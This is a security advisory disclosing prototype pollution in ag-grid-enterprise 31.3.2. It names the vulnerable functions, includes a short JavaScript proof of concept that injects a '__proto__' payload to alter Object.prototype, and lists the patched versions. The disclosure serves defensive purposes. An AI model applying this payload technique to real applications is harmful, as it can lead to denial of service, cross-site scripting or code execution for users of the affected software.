Vulnerability type: Prototype Pollution
SVSS Score 9.8 CRITICAL
Vendor of the Package: ag-grid
Affected Package:
- Product: ag-grid-enterprise
- Version: 31.3.2
Affected component(s):
_.mergeDeep, _ModuleSupport.jsonApply, _ModuleSupport.setPath, _Util.jsonApplyAttack vector(s):
the attacker can modify built-in Object.prototype by calling the vulnerable function: _.mergeDeep, _ModuleSupport.jsonApply, _ModuleSupport.setPath, _Util.jsonApply with an argument containing a special property __proto__ to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.
Description:
Affected versions of this package are vulnerable to Prototype Pollution through the vulnerable function: _.mergeDeep, _ModuleSupport.jsonApply, _ModuleSupport.setPath, _Util.jsonApply. An attacker can alter the behavior of all objects inheriting from the affected prototype by passing arguments to the vulenrable function crafted with the built-in property: __proto__. The attack can potentially escalated to Denial of service, remote code execution or cross-site scripting attacks depends on the gadgets that may affected by the attack
Proof-of-Concept:
(async () => {
const lib = await import('ag-grid-enterprise');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
// enable one method at a time.
lib._.mergeDeep ({}, JSON.parse('{"__proto__":{"test":123}}'))
//lib._ModuleSupport.jsonApply ({}, JSON.parse('{"__proto__":{"test":123}}'))
//lib._ModuleSupport.setPath ({}, "__proto__.test", 123)
//lib._Util.jsonApply ({}, JSON.parse('{"__proto__":{"test":123}}'))
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.test;
})();
Please note this has been addressed and resolved:
31.3.4for version 31 and patch32.0.2for version 32 of AG Grid9.3.2for version 9 and patch10.0.2for version 10 of AG Charts